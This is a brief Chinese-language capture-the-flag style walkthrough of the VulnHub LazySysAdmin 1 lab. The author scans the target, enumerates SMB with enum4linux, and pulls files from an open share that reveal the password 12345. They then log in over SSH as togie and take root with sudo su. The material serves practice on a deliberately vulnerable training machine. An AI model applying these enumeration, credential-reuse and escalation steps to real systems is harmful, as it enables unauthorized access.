下载链接:https://www.vulnhub.com/entry/lazysysadmin-1,205/
扫描目标主机
...省略输出
有用的信息包括:
http://x.x.x.x/phpmyadmin/
http://x.x.x.x/wordpress/wp-admin
http://x.x.x.x/wordpress/
找到疑似用户名的:togie
使用enum4linux x.x.x.x,查找有用信息。
smbclient //x.x.x.x/share$ 空密码
get rebots.txt
get todolist.txt
get deets.txt 发现在密码12345
适用于ssh togie/12345
ls
id
sudo su